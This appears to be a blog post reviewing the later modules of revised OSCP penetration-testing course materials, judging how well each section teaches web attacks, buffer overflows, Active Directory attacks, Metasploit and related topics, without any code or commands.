Updated OSCP Materials: Part Three

Moving on to the third (last) section of my review of the OSCP revised materials. There was a huge amount of content to go through, so this took some time. This article starts with the web attacks section and follows to the very end. This is mostly a review of the actual narrated modules, though the pdf is very similar, and is great for cutting out code snippets for later use, unless you're like me, and find some joy in retyping everything.

Web application attacks; holy cow, this section has improved dramatically! “DIRBEE?!” , when all this time, I have been pronouncing it DIRB! The web application attack section is guided by the OWASP methodology, and provides much better explanations into terminology and concepts. You’ll find a deeper dive into web applications than previously. Modules have greatly improved in this section from their previous version as well. There is an excellent review of inspecting webpages and the developer tools available in Firefox. Excellent coverage of Burpsuite and Intruder. XSS is explained well, as is session/cookie compromise. The LFI/RFI and log file poisoning modules are also very good, with great practical applications.

The SQL injection module is good, with some nice, subtle humor. The module has an excellent walkthrough of tools and techniques. Additionally, there is a great walkthrough from enumeration to SQL code execution. “ESSCUELL”? I WAS pronouncing it that way, but ended up moving to saying “sequel” after receiving some raised eyebrows. There are some great practical exercises with sqlmap as well, which will certainly help you out.

The Buffer Overflow module is very in depth. Great walkthrough of the stack and naming conventions to help with gaining a basic understanding. Navigating code may be a bit confusing for those with no programming or Assembly knowledge. It does ultimately walk you through the overflow, which helps make the terminology and behaviors make much more sense. No more SLMail walkthrough! New app, with a vuln found in 2017. This version has a much better explanation as to HOW you begin identifying and crafting exploits. Also, the revised content introduces a new, more relevant fuzzing tool walkthrough. The Linux BO review includes some excellent concepts and methods, as well as showing you new ways to craft your exploits.

Client side attacks include some great social engineering examples, and an excellent client fingerprinting module. Great walkthrough on modifying and using fingerprinting applications. Additionally, the course materials provide a solid update of Microsoft IE attacks, Edge attacks, and MS Office attacks. There is an especially excellent review of macro attacks.

The new courseware provides a few new tricks and resources for finding and using publicly available exploits, including the old warning of the “rm -rf” JMP code trickery. Great review of SearchSploit and nmap NSE scripts. Great review of Beef and the capabilities found within. Also, good walkthrough of how one would move from recon, to exploit research, to exploit execution.

The new courseware has a great review of how to fix exploits, and how to alter exploits to suit your particular needs. Memory corruption and web exploits are both covered in detail. Good review of cross-compilation techniques. Excellent troubleshooting section.

Great fieldwork guidance for transferring attack tools, beyond the simple CTF-style lab considerations. Good explanation of non-interactive shells and options. Great examples of file transfer options. Fileless exploits are also covered, as well as other useful tools. Some examples moved a little too quickly, but that’s why you have the pdf! The AV evasion section and privilege escalation sections are also very well done. The password attack module was also expanded upon.

Port forwarding has been greatly improved upon, with a much deeper explanation, and demonstration of many of the tools you will use. This section is far more detailed than in the old course material.

Very involved module on AD attacks, and any field consultant will recognize many of the techniques used.Even seasoned pen testers will learn a new thing or two. Excellent coverage of both NTLM and Kerberos attack methodologies, lateral movement, and clever implementation of both.

For Metasploit, there’s a great walkthrough of the MSF functionality. You’ll very likely pick up a few tricks that you might not have known of before, Excellent explanations of many functions and customizations you might not have used, including how to craft your own MSF module.

A new section was added covering Powershell Empire, with a great walkthrough of a very useful tool, as well as ways it can be used in conjunction with MSF.

Finally, the modules end with a walkthrough of a penitent, starting from initial enumeration to domain compromise. Overall very good, but some of the steps were either somewhat unintuitive, or required some firsthand knowledge of the scenario, as the steps easily could’ve went awry without knowing the issues beforehand, such as several points where there was a certain degree of guesswork/ambiguity. THIS is where you’ll find yourself chasing rabbits down the rabbit hole, and being stuck for hours on a false lead. However, there are a few cases during the walkthrough where the tester also encountered failure, and was forced to backtrack. 

I do believe this is one of the harder things to effectively teach, because each scenario is different, and really, in their defense, it takes a certain attention to clues, intuition, and the ability to keep hammering away despite it being a rabbit hole in order to be effective. We can all be tripped up by either missing the obvious, or missing the not so obvious, or requiring a crash course in some proprietary software we’ve never worked with before. All things considered, however, it is a great example of how one moves through the steps from initial enumeration, and through multiple machines and challenges, to achieve domain administrator.

Things I have noticed in the new material have been much better explanations of things, rather than the old “give them a rough sketch and them figure out the rest”, so that the courseware is actually far more self-sufficient to guide you. I did find it interesting that the Impacket suite of tools, as well as SMB Responder, was absent from the modules. Overall, the new materials are definitely worth looking into, even if you've already taken the old course.